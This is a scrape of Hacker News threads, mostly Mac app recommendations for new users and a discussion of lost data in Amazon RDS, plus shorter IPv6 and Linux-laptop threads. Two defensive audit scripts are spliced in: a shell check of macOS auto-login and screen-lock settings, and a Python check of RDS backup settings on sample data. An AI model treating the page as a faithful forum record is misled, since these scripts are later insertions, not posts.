As a developer I'm very happy that http://mxcl.github.com/homebrew/ exists. It's a package manager (#packages as of today: 2024), like apt or yum - with a very nice command line interface and a great community.

> Homebrew is the easiest and most flexible way to install the UNIX tools Apple didn't include with OS X.

7
MehdiEG 16 hours ago 2 replies      
Interesting - I haven't actually reviewed my Mac's config in a while - I might pick up a few goodies in those lists myself. For what it's worth, this is what I would automatically install on any new Mac:

- iStat Menus: RAM, network and CPU usage right in your menu bar. Ridiculously useful.

- Video player: VLC

- FTP: CyberDuck. Desperately slow to launch and not a big fan of the UI but it's free, it works and I use FTP rarely enough to never have bothered looking for something better.

- gfxCardStatus - not necessarily a must-have but quite handy to see which app is causing your Mac to switch to the battery-sucking discrete GPU.

- Email: MailPlane (gmail / google apps only). I have to say that I've never found what I would consider to be a great email client for my taste on either Mac or Windows. So these days, I stick with Gmail's web interface (which I'm not a big fan of either but there's no native app that I find any better).

- Text Editor: TextWrangler. I still prefer Notepad++ though (in part because TextWrangler, like so many apps on Mac OS X, is so slow to launch).

- DaisyDisk - for later when you'll inevitably run out of disk space.

- Parallels Desktop for Windows + Remote Desktop Connection to manage Windows servers. I wish there was a better RDP client and a decent SSMS-like SQL Server client.

- Apps that used to be must-have but that I no longer use: HandBrake (DVD ripping), LiquidCD (CD / DVD burning), NetNewsWire (RSS)

That's about it. Random stuff that you might or might not need: Acorn (simple, cheap image editor), CoconutBattery, Hues (standalone color picker), iStumbler (Mac OS X's NetStumbler), MacHg (Mercurial client). You can try Sparrow for email too.

That's it - I have surprisingly few apps actually.

8
pooriaazimi 8 hours ago 0 replies      
(Haven't read other suggestions. Certainly all of these have been suggested before, in that case bump the vote count on those apps!)

- First thing you should do: Install Homebrew: https://github.com/mxcl/homebrew/

- IRC: Colloquy - http://colloquy.info

- Editor: Sublime Text 2 - http://www.sublimetext.com/2

- Launcher: QuickSilver or Alfred

- Lion's Mail.app is great. I used to use Sparrow (http://sparrowmailapp.com) on Snow Leopard, but don't need it anymore. It's a little buggy and I like Mail.app's UI better.

- IMPORTANT: Check http://gpgtools.org for a simple app that lets you manage PGP credentials and use them in Mail.app and elsewhere (don't miss this one)

- RSS reader: Reeder - http://itunes.apple.com/us/app/reeder/id439845554?mt=12

- You're new to Mac, so install CheatSheet (http://itunes.apple.com/us/app/id529456740?mt=12) to learn keyboard shortcuts by heart (press down CMD key for 2 seconds to get a list of all shortcuts)

- Check this blog out - it has plenty of great stuff about OS X that even veteran OS X users don't know (trust me, I know a lot of them): http://www.macyourself.com

- You'll inevitably wonder what 'ocspd' or 'mdworker' are, when using 'ps -Ac' or 'top' (spoiler: ocspd is for certifications, and mdworker, or metadata-worker is a process that gathers information about files and feeds them to Spotlight for search), so install atMonitor (http://www.atpurpose.com/atMonitor/) instead of searching for process names on the Internet. It offers tons of other cool features.

- Markdown Pro (http://www.markdownpro.com) and Mou (http://mouapp.com) for Markdown.

- As much as I despise iTunes, nothing comes close to it (unfortunately) in terms of media management.

- Bartender - tidies messy menu bars: http://www.macbartender.com

9
AdamGibbins 15 hours ago 1 reply      
* Witch (http://manytricks.com/witch/) - Gives you Alt-Tab (Window switching) alongside the default Cmd-Tab (Application Switching).

* Moom (http://manytricks.com/moom/) - allows you to move windows around a lot easier.

* TotalFinder (http://totalfinder.binaryage.com/) - Finder with tabs and other useful bits.

* CoRD (http://cord.sourceforge.net/) - Decent RDP client (better than the official Microsoft one).

* Caffeine (http://itunes.apple.com/gb/app/caffeine/id411246225) - Stops the screensaver activating at the click of a button.

* CleanMyMac (http://macpaw.com/cleanmymac) - Can strip the unwanted language packs etc from applications saving you a significant amount of space.

* Enqueue (http://www.enqueueapp.com/) - Decent iTunes replacement, with FLAC support.

* Flu.x (http://stereopsis.com/flux/) - Warmer screen during dark hours, makes it easier to work in dim light.

* SourceTree (http://www.sourcetreeapp.com/) - Decent GUI Git/Hg/SVN client.

* GrabBox (http://grabbox.devsoft.no/) - Instantly throws screenshots into your Dropbox public folder.

* iStat Menus (http://bjango.com/mac/istatmenus/) - Memory and CPU utilisation in your menu bar.

* YoruFukurou (http://itunes.apple.com/gb/app/yorufukurou/id428834068) - Decent Twitter client with muting rules etc.

10
ricardobeat 17 hours ago 0 replies      
This is my current setup. The real essentials are Dropbox, ST2 and Homebrew, but these are all amazing pieces of software:

- Sublime Text 2 editor (even has a vim mode) (http://www.sublimetext.com/2)

- Sparrow, but you might be happy with the native Mail app (http://sparrowmailapp.com/)

- Media: iTunes and Quicktime do a good job, VLC occasionally.

- Handbrake for encoding (http://handbrake.fr)

- Transmission (http://www.transmissionbt.com/)

- Dropbox (http://getdropbox.com)

- Cloud app: instant, easy uploads (http://getcloudapp.com)

- Twitter's official client (http://itunes.apple.com/us/app/twitter/id409789998)

- CSS: uh? There is Coda/TopStyle/Espresso, but ST2 is enough

- Github for Mac (http://mac.github.com)

- Versions for SVN (http://versionsapp.com)

- Sequel Pro (http://www.sequelpro.com/)

- Homebrew package manager (http://mxcl.github.com/homebrew/)

- ImageOptim (http://imageoptim.com/)

- CodeKit or LESS.app for LESS/Coffee compiling (http://incident57.com/codekit/)

- MS Office: yeah (it's much better than the windows version). Just hide the cruft away (MSN etc) after installing.

- Wunderlist to-do app (http://wunderlist.com)

Nice to have / superfluous:

- Mou markdown editor (http://mouapp.com/)

- Cathode: vintage terminal emulator (http://www.secretgeometry.com/apps/cathode/)

- Lidpop: make noises when you close/open your lid (https://shinyplasticbag.com/lidpop/)

11
johncoltrane 8 hours ago 0 replies      
* Adium is great.

* Growl works very well but the whole notification business (emails + builds + IM + song details…) can be counter productive. Use it lightly.

* iTerm2 is the most modern terminal emulator you'll find on Mac OS X. I use it only because I wanted 256 colors and I'm not on Lion. I've never used its more advanced features.

* I don't know Notepad++ but I would say Sublime Text 2 (http://www.sublimetext.com/blog/articles/sublime-text-2-beta) and TextMate (http://macromates.com/) may do. You could also try a full blown IDE like Aptana (http://aptana.com/) or RubyMine (http://www.jetbrains.com/ruby/). If you already know Vim, MacVim (https://github.com/b4winckler/macvim) is the way to go for both the GUI and the CLI.

* Apple's own Mail.app works well. I've never felt the need to use another app. Microsoft's Outlook is pretty good, too.

* VLC is the obvious choice on Mac OS X too. You might want to install Perian (http://perian.org/) to add support for many exotic formats to Quicktime. For audio, Cog (http://cogx.org/) is nice.

* You don't need a CSS editor. Just use your code editor.

---

You might be interested in a few other apps:

* ClipMenu (multiple clipboards) http://www.clipmenu.com/

* Burn (disc burning) http://burn-osx.sourceforge.net/Pages/English/home.html

* Charles (http debugging) http://www.charlesproxy.com/

* DejaMenu (access the menubar from a contextual menu) http://homepage.mac.com/khsu/DejaMenu/DejaMenu.html

* HTTP Client (http debugging) http://ditchnet.org/httpclient/

* Notational Velocity (the most elegant AND efficient note taking app ever) http://notational.net/

* Quicksilver (Quicksilver) http://qsapp.com/

* ShiftIt (window positioning) https://github.com/fikovnik/ShiftIt

* The unarchiver (opens exotic archive formats) http://wakaba.c3.cx/s/apps/unarchiver.html

* Yummy FTP (the best FTP client on Mac OS X) http://www.yummysoftware.com/

* VirtualBox (virtual machines) https://www.virtualbox.org/

* SourceTree (Git/Mercurial GUI) http://www.sourcetreeapp.com/

12
nerdfiles 16 hours ago 2 replies      
I prefer Alfred (http://www.alfredapp.com/) over Quicksilver.

Recommending:

1. https://github.com/Lokaltog/vim-powerline

2. https://github.com/revans/bash-it

3. https://github.com/tpope/vim-fugitive, https://github.com/tpope/surround

4. The https://github.com/scrooloose/nerdtree

5. http://bywordapp.com/

6. http://bbt2.drikin.com/

7. http://willmore.eu/software/isolator/

8. https://gist.github.com/2260182 (OS X for Hackers)

9. Cathode (http://www.secretgeometry.com/apps/cathode/, for shits and giggles)

10. DiffMerge (http://www.sourcegear.com/diffmerge/)

11. Electric Sheep (http://www.electricsheep.org/)

12. Gridwars (http://gridwars.marune.de/)

13. Integrity (http://peacockmedia.co.uk/integrity/)

14. httrack (http://www.httrack.com/)

15. iSoul (http://code.google.com/p/isoul/)

16. LittleIpsum (http://littleipsum.com/)

17. KeyCastr (https://github.com/sdeken/keycastr, more shits)

18. LiveReload (http://livereload.com/)

19. Mactracker (http://mactracker.ca/)

20. Onyx and/or Maintenance (http://www.titanium.free.fr/)

21. MAMP (http://www.mamp.info/)

22. MacVim (http://code.google.com/p/macvim/)

23. Patterns (http://itunes.apple.com/us/app/patterns-the-regex-app/id4294...)

24. Mou (http://mouapp.com/)

25. mutt (http://www.mutt.org/)

26. Pixelmator (http://www.pixelmator.com/)

27. ProCSSor (http://procssor.com/)

28. Reeder (http://reederapp.com/)

29. Skim (http://skim-app.sourceforge.net/)

30. Slammer (http://ringce.com/slammer)

31. Q (http://www.kju-app.org/)

32. svnX (http://www.lachoseinteractive.net/en/community/subversion/sv...)

33. SSHTunnel (https://github.com/primalmotion/sshtunnel)

34. localtunnel (http://progrium.com/localtunnel/)

35. The Unarchiver (http://wakaba.c3.cx/s/apps/unarchiver.html)

36. Homebrew (http://mxcl.github.com/homebrew/)

37. VLC Player (http://www.videolan.org)

38. Compass/SASS/LESS (http://compass-style.org/install/, http://sass-lang.com/, http://lesscss.org/)

39. Pandoc (http://johnmacfarlane.net/pandoc/)

40. http://code.google.com/p/zen-coding/

13
moocow01 17 hours ago 0 replies      
* iWork - Cheaper than Office and better in my opinion

* Transmit - FTP

* Pixelmator - 90% of Photoshop without the high cost but still with a slick interface

* Cornerstone/Versions - SVN

* Textmate - Code editor

* Wunderlist - Todo list

* Fantastical - Easy way to access and add dates to your mac calendar

* Concentrate - Block HN and other stuff when you need to get things done

(Note: Most of these are not free and are between $10-$80 but well worth it in my opinion)

14
msutherl 16 hours ago 1 reply      
Things I haven't seen here yet:

1. Backblaze for off-site backups: http://backblaze.com
2. Dash for accessing docs: http://itunes.apple.com/us/app/dash-docs-snippets/id45803487...
3. Solarized and ir_black themes for Terminal and all editors: http://ethanschoonover.com/solarized / http://blog.toddwerth.com/entries/13 (I use ir_black w/ Terminal.app, terminal Vim and the sidebar fork of Macvim: https://github.com/alloy/macvim/wiki/Screenshots)
4. This fork of GitX: http://gitx.laullon.com/
5. DTerm (pop-up terminal emulator for the occasional 'less README'): http://decimus.net/DTerm
6. XScope (rulers and stuff for UI design): http://xscopeapp.com/
7. LittleSnapper (tried everything, this is the fastest and cleanest way to collect UI inspiration - Skitch + Evernote would be my second choice): http://www.realmacsoftware.com/littlesnapper/
8. Found (don't use this much, but it's awesome. Indexes Gmail, Dropbox and Google Drive and lets you search and launch files - a bit like Alfred): https://www.foundapp.com/
9. DaisyDisk (essential harddrive file visualization): http://www.daisydiskapp.com/

And, another shoutout for Quicksilver - more powerful than Alfred.

15
gks 17 hours ago 0 replies      
Apps that I install immediately upon re-installation or a new Mac:

* 1Password - Password facilitator (http://www.agilebits.com, buy the Mac App Store version)

* OmniFocus - GTD/Todo list (http://www.omnigroup.com/omnifocus)

* OmniOutliner - Best list-making app ever (http://www.omnigroup.com/omnioutliner)

* OmniGraffle - Great for development purposes (http://www.omnigroup.com/omnigraffle)

* Acorn - Quick image editing (http://www.flyingmeat.com/acorn)

* VoodooPad - Personal Wiki (http://www.flyingmeat.com/voodoopad)

* Byword - Markdown editor (http://bywordapp.com/)

* Dropbox - Duh (http://www.dropbox.com)

* Fantastical - Calendar app (http://flexibits.com/)

* Launchbar - Launcher (http://www.obdev.at/products/launchbar/)

* Reeder - Google Reader client (http://reederapp.com/)

* Transmit - SFTP (http://panic.com/transmit/)

* VLC - Video (http://www.videolan.org)

Along with iA Writer, Writeroom, Sublime Text, etc etc... there are a lot of great apps. The above are my favorites.

16
gte910h 11 hours ago 0 replies      
DragonDrop (shake the mouse to drop stuff in an always-on-top window, then drag it back out when you find where you want to drop it and it disappears)

Divvy (Lay out all your windows on a grid extremely quickly)

Skitch (quickly marking up screenshots, photos, etc)

WeatherHD (Lap warming tool, also renders beautiful full screen weather for what's happening where you are/where you set it to)

Visual JSON (JSON validator, builder)

Crash Plan Pro (a pretty reasonably non-invasive offsite backup program)

1Password (Cross platform/Smartphone password autofill manager)

Camouflage (Hides everything on the desktop when you present)

Caffeine (Keeps the laptop awake while you're presenting)

Daisy Disk (Finds the crap you can delete and clean off the hard drive quickly and beautifully, and makes cleanup a joy)

Screenflow (Excellent videocasting/webcasting/tutorial making software) (Currently on sale at http://www.mupromo.com/ for half off its $99 pricetag with other stuff included)

Screenshots (Fantastic tool for taking a picture of exactly the section of the screen you want, and nothing more).

If you have iOS devices you like/use too, AirDisplay (makes an iPad or iPhone an extension of the mac desktop) and AirServer (makes the mac a mirror of the iOS screen using Airplay).

17
Jun8 17 hours ago 0 replies      
DVD Ripper is an excellent tool that I use often. If you deal with video you will want to install Handbrake, too (and of course vlc).

Geektool is an excellent tool that puts a lot of stats about your Mac on the desktop; it's infinitely customizable, but has a steep learning curve, maybe to be installed in the second batch.

I hate iCal, although it does integrate different calendars. I think it and Mail tool are some of the poorest designed Mac software (e.g. compared with Outlook) but what are you going to do.

Secrets is another advanced tool, that exposes many hidden settings for the Mac.

18
dewitt 17 hours ago 0 replies      
The first things I install on any Mac (and goodness knows there have been a lot of them):

- Google Chrome (http://chrome.google.com)
- iTerm2 (http://www.iterm2.com/)
- Xcode (http://developer.apple.com/xcode/)
- Homebrew (http://mxcl.github.com/homebrew)
  - For emacs-snapshot, zsh, git, gnupg, etc.
- Google Drive (https://drive.google.com)
- Flux (http://stereopsis.com/flux/)
- TextMate (http://macromates.com/)
- VLC (http://www.videolan.org/vlc)
- Transmission (http://www.transmissionbt.com/)

Then, things like the Sonos controller, the Rdio and Spotify apps, Adobe Lightroom 4, Photoshop, etc.

But the above are the ones that seem to make it onto every new machine in the first day or two.

Enjoy!

19
kls 2 hours ago 0 replies      
If you do anything with a lot of private network web development Gasmask is a must. It is a great little host file switcher.

http://code.google.com/p/gmask/

20
kennu 16 hours ago 0 replies      
I don't know if many people agree with this, but I would also recommend you to give Apple's built-in OSX apps a try before installing replacements. I've used Mail, Calendar, Address Book and Terminal for many years without feeling a compelling need for alternatives. They usually work well if you're happy with the way they've been designed and don't try to bend them too much to your old habits.

Other apps that I always install on new Macs are Homebrew, VLC, Adium, MacIrssi and then the usual stuff that's on any PC (Spotify, Skype, Dropbox, Minecraft, F.lux).

And yeah it's important to install Xcode, otherwise your system doesn't have a C compiler so you can't do much. I think Git is also included with it.

21
rdrimmie 17 hours ago 0 replies      
I'm a big fan of Jumpcut (http://jumpcut.sourceforge.net/), a dedicated clipboard manager. Several other tools that include clipboard management have been mentioned but if you don't want the rest of the functionality, this is great for it.

iCal and Mail do a fantastic job syncing with Google and Exchange, so I use those.

22
jessor 17 hours ago 0 replies      
I purchased two apps within the first few weeks after my switch to a MBP:

1) Moom (move/zoom windows) - http://manytricks.com/moom/

2) TotalFinder (enhances the finder) - http://totalfinder.binaryage.com/

Some other must haves for me:

* MacVim

* Alfred

* Cyberduck

* Homebrew

* VLC

23
riffraff 17 hours ago 0 replies      
stuff I have installed

* rather than vanilla vim, try MacVim

* textmate is popular, though I don't use it

* tunnelblick for vpn management

* video: vlc, but mplayerx and MPlayer OSX Extended are popular options

* TotalTerminal (make terminal show/hide with a keystroke)

* cyberduck (ftp/s3/whatever file transfer client)

* keka as unarchiver

* xchat aqua as alternative irc client

24
shaufler 17 hours ago 0 replies      
Sublime Text 2 (http://www.sublimetext.com/) and MacVim (http://code.google.com/p/macvim/) are my preferred text editors.

Sparrow (http://sparrowmailapp.com/) is my favorite email client.

I can't live without a window resizer on OS X. Use SizeUp (http://www.irradiatedsoftware.com/sizeup/) for easy window maximizing, half splits, and quadrant resizing.

25
digitalengineer 8 hours ago 0 replies      
For security:

PREY: http://preyproject.com/
KNOX: https://agilebits.com/knox

Don't set your Mac to auto-login on your main account. I use an empty account that starts up automatically. It has no real data and Prey is installed on it. Set the screen to lock after 1 min of not using it. I keep important stuff in its own Knox vault.
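
The two settings recommended above (no auto-login on the real account, a screen that locks within a minute of going idle) can be checked from a shell rather than by clicking through System Preferences. This is an added example, not code from the thread or from Prey or Knox. It assumes the `defaults` domains and keys that OS X of that period used for these preferences: `com.apple.loginwindow autoLoginUser`, `com.apple.screensaver askForPassword` and `askForPasswordDelay`, and the per-host `com.apple.screensaver idleTime`; the 60-second threshold is the "1 min" from the comment. The `check_*` functions take the raw values as arguments so the policy logic can be exercised on any system; `audit_mac` runs the live read on a Mac.

```shell
#!/bin/sh
# Added example (not from the HN thread): audit the two settings the
# comment above recommends, no auto-login and a screen that locks within
# a minute of going idle. The `defaults` domains/keys below are assumed
# to be the ones OS X of that era exposed; the pure check_* functions take
# the raw values so the policy can be tested without a Mac.
#
# Usage on a Mac:  . ./mac_lock_audit.sh; audit_mac

# Pass (0) when no auto-login user is configured.
# $1: output of `defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser 2>&1`,
#     which is a username when enabled, or a "does not exist" error when disabled.
check_autologin() {
    case "$1" in
        ""|*"does not exist"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Pass (0) when the screen saver asks for a password and the screen is
# locked within 60 seconds of idle (idle delay + password grace period).
# $1: askForPassword (0/1)   $2: askForPasswordDelay (seconds)
# $3: screen saver idleTime (seconds; 0 means the saver never starts)
check_screen_lock() {
    ask="$1" delay="$2" idle="$3"
    [ "$ask" = "1" ] || return 1
    for n in "$delay" "$idle"; do
        case "$n" in ''|*[!0-9]*) return 1 ;; esac
    done
    [ "$idle" -gt 0 ] && [ $((idle + delay)) -le 60 ]
}

# Live audit; only meaningful on macOS, where defaults(1) exists.
# Prints PASS/FAIL per setting and returns non-zero on any FAIL.
audit_mac() {
    command -v defaults >/dev/null 2>&1 || { echo "defaults(1) not found; run this on a Mac"; return 2; }
    rc=0
    al=$(defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser 2>&1)
    if check_autologin "$al"; then
        echo "PASS auto-login is disabled"
    else
        echo "FAIL auto-login is enabled for '$al'"; rc=1
    fi
    ask=$(defaults read com.apple.screensaver askForPassword 2>/dev/null)
    delay=$(defaults read com.apple.screensaver askForPasswordDelay 2>/dev/null)
    idle=$(defaults -currentHost read com.apple.screensaver idleTime 2>/dev/null)
    if check_screen_lock "${ask:-0}" "${delay:-0}" "${idle:-0}"; then
        echo "PASS screen locks within 60s of idle"
    else
        echo "FAIL screen lock: askForPassword=${ask:-unset} delay=${delay:-unset}s idleTime=${idle:-unset}s"; rc=1
    fi
    return $rc
}
```

Keeping the policy checks separate from the `defaults` reads is what makes the script worth having: the thresholds are in one place, and the same functions can be pointed at values collected from many machines (for example, from an MDM inventory) without needing a Mac to evaluate them.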

26
haar 17 hours ago 0 replies      
Try out ZSH if you want to try something slightly different to Bash
Package Manager: Homebrew - https://github.com/mxcl/homebrew
Terminal/Emulator: iTerm2 - http://www.iterm2.com/
Vim running in iTerm2 via Homebrew
Chat Client: Adium - http://adium.im/
MySQL DB GUI: Sequel Pro - http://www.sequelpro.com/
Mail: Sparrow - http://sparrowmailapp.com/
Git GUI: GitX (L) - http://gitx.laullon.com/
Window "manager" : Shiftit - https://github.com/fikovnik/ShiftIt
General productivity: I love QuickSilver, however it's been crashing quite frequently on me since I installed Lion, so I'm giving Alfred a try at the moment.

Note: all of the above are at least free (lite), if not completely free. I was thrown completely in the deep-end with terminal vim and just took to it as part of my "getting used to Mac" steps, which I think benefited me with respect to getting down with the nitty gritty of it and not complaining it was different to my Notepad++ experience prior on Windows.

27
tbeseda 17 hours ago 0 replies      
Can't recommend Sublime Text 2 enough.

Same with Sparrow for (non power use) GMail.

Currently enjoy Found (over Alfred and Quicksilver) as a Spotlight (native to OS X) replacement -- it's free in the "App Store"

28
mproud 9 hours ago 0 replies      
As far as graphic editors go, my favorite is Pixelmator.

Most people don't need Photoshop but still want something that supports layers, does image manipulation basics and feels like a happy OS X citizen.

On the other hand, GraphicConverter is the Swiss army knife of image formats and is even more powerful. GC can read virtually any image file ever created. It's a little more buggy, and the UI is less modern/fancy, but oh so handy.

29
tjr 17 hours ago 0 replies      
You might like Things, if you're into stuff like that:

http://culturedcode.com/things/

30
arn 17 hours ago 0 replies      
http://sites.google.com/site/yorufukurou/home-en

Yorufukurou - hardcore twitter client

31
Karma_Police 17 hours ago 1 reply      
I don't really see the point in Growl, and it is now a paid app, so you could skip it, unless your workflow requires you to be notified of something immediately.

Media player: I prefer mplayerx to VLC. mplayerx is on the app store.

Text: macvim and sublime text 2.

32
billyvg 16 hours ago 0 replies      
Janus MacVim distribution - editor

VLC - video player

iTunes - music

Alfred - launcher

Divvy - window management (can create hotkeys for resizing/positioning windows)

Kaleidoscope - great diff tool

I use the default Mail and Calendar apps

33
phr3aked0ut 14 hours ago 0 replies      
- MPlayerX (http://mplayerx.org/) Great standalone video player

- Perian (http://perian.org) Perian lets quicktime run almost any video format. Unfortunately it's not under active development. Still useful to have installed regardless.

- Google Chrome (http://www.google.com/chrome) Don't install Flash unless you have to. Chrome has it built in. I use Safari for most of my browsing and switch to Chrome when I want to use flash.

- If you aren't going to install Flash, then install YouTube5 (http://www.verticalforest.com/youtube5-extension/) It's a Safari extension that lets you watch YouTube videos natively without Flash.

- Day-O (http://www.shauninman.com/archive/2011/10/20/day_o_mac_menu_...) Adds a drop down calendar to the menubar.

- Alfred (http://www.alfredapp.com/) Another vote for Alfred. Much quicker and more powerful than Spotlight.

- 1Password (https://agilebits.com/onepassword) Remembers passwords/logins and makes it super easy to auto login to sites.

34
block 13 hours ago 0 replies      
These are the things I use daily (most are free!):

[Development]
Spotlight - OSX built in app launcher etc
SourceTree - GUI Git/Hg/SVN client.
HomeBrew - like apt, yum package manager
MacVim - Coming from the GUI world look at Janus
iTerm2 (Zsh, OhMyZSH plugins)
MAMP - Apache, MySQL etc dev env (like XAMPP)
$ CSSEdit - GUI CSS editor, mainly use vim
CyberDuck - (s)FTP
Sequel Pro - MySQL GUI, SSH connection
$ Parallels - VM

[Calendars] - iCal or $ Busy Cal
[Mail] - OSX Mail
[Office] - $ iWork, LibreOffice
[Feed Reader] - NetNewsWire
[Torrent] - Transmission
[Transcode] - Handbrake

[Utilities]
$ little snitch - Network monitor
MenuMeters - Free limited version of iStatMenus
Flip4mac WMV in Quicktime
Perian (Make QuickTime like VLC)
TwoUp - free window basic management
RightZoom - Maximise zoom button
ClipMenu - Multi Copy, Paste board
UnArchiver - File Decompression
CleanArchiver - File compression (sans .DS_Store)
NameChanger - GUI for mass renaming files
Onyx - System maintenance and set extra OS defaults
Click2Flash - Extension in Safari blocks flash defaults to HD mp4, right click to download video.

35
NonEUCitizen 14 hours ago 0 replies      
Xcode -- don't you want to write iOS apps?
36
markburns 17 hours ago 0 replies      
thoughtbot laptop script
https://github.com/thoughtbot/laptop
37
medusa666 16 hours ago 0 replies      
F.lux and Clipboard make my life better.
38
var 15 hours ago 0 replies      
once mountain lion releases, I don't think you need adium and growl
39
WalterSear 15 hours ago 0 replies      
bootcamp
15
Amazon RDS failure - data has been lost
80 points by akhkharu  3 days ago   47 comments top 7
1
EwanToo 3 days ago 5 replies      
RDS should not have lost data, and if I were a user of it, I'd be annoyed too.

At the same time, if you've not spotted by now that EBS (elastic block storage, which powers RDS) is not reliable and not to be trusted, then you have to look at yourself too.

EBS is by far the worst product AWS offer, you simply should not use it without a very good reason, and if you do need to use it, you have to assume any given drive image will disappear at any moment - as it did here.

Beyond that, any time you're running a database, no matter who the provider is, if you're not doing backups every day or hour, then you're not doing things right.

2
justincormack 3 days ago 2 replies      
Use multi AZ then, which performed as expected. There have been so many warnings about single AZ that you would hope people get it by now.
3
PaulHoule 3 days ago 2 replies      
If you had a database running on a dedi you could get trashed by a server failure too.

Good backups are the best defense.

4
debacle 3 days ago 0 replies      
But but...the cloud.
5
purephase 3 days ago 2 replies      
I'm not sure I understand the "which does not have actual data" part of your statement.

Could you explain that a bit more?

6
mschalle 2 days ago 0 replies      
Always assume Murphy's law will hold, regardless of what service provider you use.

If you were running your own database, you surely would have had rigorous backups because the responsibility was on you.

Assume that if a service can fail, it will. If data can be lost, it will be. Then, plan accordingly.

EDIT: grammar

7
bananashake 2 days ago 0 replies      
Why do you think the "Restore to Point in Time" failed to work? That puzzles me the most in this catastrophe and no one has addressed it. In theory with Point-in-Time restoration you should not lose data from a failure on just the storage where the InnoDB is stored.
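The comments in this thread keep returning to three settings that decide whether an RDS storage failure costs you data: Multi-AZ, automated backups, and a usable point-in-time restore window. The following audit check is an added example, not code from the thread or from AWS; it uses the real field names from the RDS DescribeDBInstances API (DBInstanceIdentifier, MultiAZ, BackupRetentionPeriod, LatestRestorableTime) but runs over constructed sample records, so no AWS credentials or network access are assumed. The one-hour restore-lag limit is an assumed policy value.

```python
from datetime import datetime, timedelta, timezone

# Constructed sample records in the shape of an RDS DescribeDBInstances
# response. The field names are the real API ones; the values are made up
# for this example. In practice you would feed in boto3's
# rds.describe_db_instances()["DBInstances"].
SAMPLE_INSTANCES = [
    {
        "DBInstanceIdentifier": "orders-prod",
        "MultiAZ": True,
        "BackupRetentionPeriod": 7,
        "LatestRestorableTime": datetime(2012, 6, 18, 15, 58, tzinfo=timezone.utc),
    },
    {
        # Single AZ, backups switched off: exactly the setup the thread warns about.
        "DBInstanceIdentifier": "analytics-single",
        "MultiAZ": False,
        "BackupRetentionPeriod": 0,
        "LatestRestorableTime": None,
    },
    {
        # Backups on, but the newest restore point is hours old.
        "DBInstanceIdentifier": "staging",
        "MultiAZ": False,
        "BackupRetentionPeriod": 1,
        "LatestRestorableTime": datetime(2012, 6, 18, 9, 0, tzinfo=timezone.utc),
    },
]

# Assumed policy: a restore point older than this is treated as a finding.
DEFAULT_MAX_RESTORE_LAG = timedelta(hours=1)


def audit_instance(inst, now, max_restore_lag=DEFAULT_MAX_RESTORE_LAG):
    """Return a list of findings for one DB instance (empty list means it passes)."""
    findings = []
    if not inst.get("MultiAZ"):
        findings.append("single-AZ: an AZ or volume failure takes the instance down")
    if inst.get("BackupRetentionPeriod", 0) < 1:
        findings.append("automated backups disabled: no point-in-time restore possible")
    lrt = inst.get("LatestRestorableTime")
    if lrt is None:
        findings.append("no LatestRestorableTime: the point-in-time restore window is empty")
    elif now - lrt > max_restore_lag:
        findings.append(f"newest restore point is {now - lrt} old (limit {max_restore_lag})")
    return findings


def audit_fleet(instances, now, max_restore_lag=DEFAULT_MAX_RESTORE_LAG):
    """Map each instance identifier to its findings."""
    return {
        inst["DBInstanceIdentifier"]: audit_instance(inst, now, max_restore_lag)
        for inst in instances
    }


def run_sample_audit():
    """Audit the constructed sample at a fixed 'now' so the result is reproducible."""
    now = datetime(2012, 6, 18, 16, 5, tzinfo=timezone.utc)
    return audit_fleet(SAMPLE_INSTANCES, now)


if __name__ == "__main__":
    for name, findings in run_sample_audit().items():
        print(f"{'OK' if not findings else 'FAIL':4} {name}")
        for finding in findings:
            print(f"      - {finding}")
```

Run as a script it prints one line per instance plus its findings; `orders-prod` passes, the other two do not. A non-empty finding list is the signal to act on before a failure, not after one.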
22
Ask HN: Any more info for the announced in-app hosted content from WWDC?
2 points by sunnynagra  1 day ago   discuss
23
Ask HN: Domain name in an ipv6 address
3 points by happyman  1 day ago   2 comments top 2
1
jameswyse 1 day ago 0 replies      
It would be cool to have a website or script which helps find words or sentences in a given ipv6 range.

I did find a blog post[1] about this by Pingdom in 2009

[1] http://royal.pingdom.com/2009/02/06/ipv6-playtime-hiding-sen...

2
mooism2 1 day ago 0 replies      
The face:b00c is within the /64 that you'd get as an ordinary residential user. Really it's just a question of your domain name being readable in hex.
24
Ask HN: Linux on a notebook
6 points by scarmig  1 day ago   7 comments top 6
1
RobGR 1 day ago 0 replies      
My next linux laptop will probably be a Dell XPS from the Sputnik project: http://bartongeorge.net/2012/05/07/introducing-project-sputn...

I think it's interesting because of the notion of having some sort of Chef or other configuration management on Github, and then being able to fork that for particular development purposes or preferences and switch between them. I gather from some of the other interviews that the sputnik project is aiming for something like that.

As far as hardware goes, I like Lenovo ThinkPads best, and the Dell E65xx series that kind of copy them are also pretty good. I expect to screw around googling driver settings and etc on any new hardware I buy, so I'm not too worried about "just working". Someone else's definition of everything "just working" probably isn't good enough for me anyway.

Running clones of specific production environments in a VM is a good idea, using it as your main everyday interface is not, IMHO.

2
signalsignal 1 day ago 0 replies      
If you have no ideological preference then use OS X. It uses a real unix and XQuartz is very up to date. You can use Homebrew, but I had some major issues with it in the past so YMMV. I personally use MacPorts as Fink is too out of date, as I have a 500gb hd and I prefer the 3rd party software to have separate dependencies from the core Mac system software.
3
ohgodthecat3 1 day ago 1 reply      
Well you could look here: http://www.ubuntu.com/certification/desktop/

But your laptop is already certified there, the sleep thing has been around in linux for a long time and the only thing is to make sure it goes to sleep before you put it away or shut it down when you are done.

Battery life again isn't going to improve with another laptop; Windows should be better for pretty much every supported laptop. You could look into buying a bigger battery maybe?

You could try System76 but I don't know that they will be better than an x220

4
falling 1 day ago 0 replies      
3) Don't try to bend OS X to be what it isn't: you will be frustrated, disappointed and will not succeed.

If you decide to learn to live with it, actually learn to live with it: you will have to adopt new usage patterns and tools. Don't try to turn it into Ubuntu, it's not.

5
oliwarner 1 day ago 0 replies      
Native is easy enough if you're willing to either shop around (our Samsung Q330 i3 took minimal messing around with for 11.10 and "just worked"™ for 12.04) or pay somebody.

You say you're willing to pay so take a look at people like Zareason and System76 -- people who design the hardware around what will work in Linux. You pay them over the odds, they support you.

But don't get hung up on some features. Battery life is one of those where everybody seems to get the same drop vs Windows. Yeah, I'd really like those bugs found and fixed but it's not going to affect my purchasing decisions. If I need long battery life, I just look at bigger batteries (or slower CPUs). Graphics is another interesting topic.

I'd also go out of my way to avoid dual-GPUs (Optimus et al) for the moment. They do work (bumblebee, ironhide, tbp, etc) but having to prepend things with optirun can get annoying - plus they're another power drain.

6
khyryk 1 day ago 0 replies      
